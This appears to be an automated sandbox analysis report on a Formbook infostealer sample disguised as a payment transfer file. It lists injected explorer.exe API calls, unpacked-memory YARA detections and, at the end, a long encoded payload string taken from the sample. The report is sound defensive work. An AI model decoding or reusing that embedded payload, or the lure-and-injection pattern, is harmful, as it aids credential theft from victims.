          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9E90 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9E8C NtClose,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 0_2_028DC2B0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 0_2_028D9990
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0040102F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041D146
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0040117A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041E229
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041D4D6
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409E40
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041D625
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409E3C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041D73F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01004120
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFB090
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1002
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B20A8
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEF900
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B2B28
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101EBB0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B22AE
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B2D07
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B1D55
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF841F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE0D20
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B1FF1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01006E30
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B2EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CED466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF25DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF2D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C20D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF2EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CED616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C46E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF1FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF28EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF20A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF22AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF2B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030AE229
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030AD146
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03092FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030AD625
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03099E3C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03099E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03092D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030AD4D6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C2B150 appears 35 times
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: String function: 00FEB150 appears 35 times
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.236125503.00000000006C1000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.243377494.0000000008A10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.243638026.0000000008BE0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.274332960.0000000000581000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275294499.000000000126F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.276581329.0000000002ECE000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeBinary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.csBase64 encoded string: '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
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPv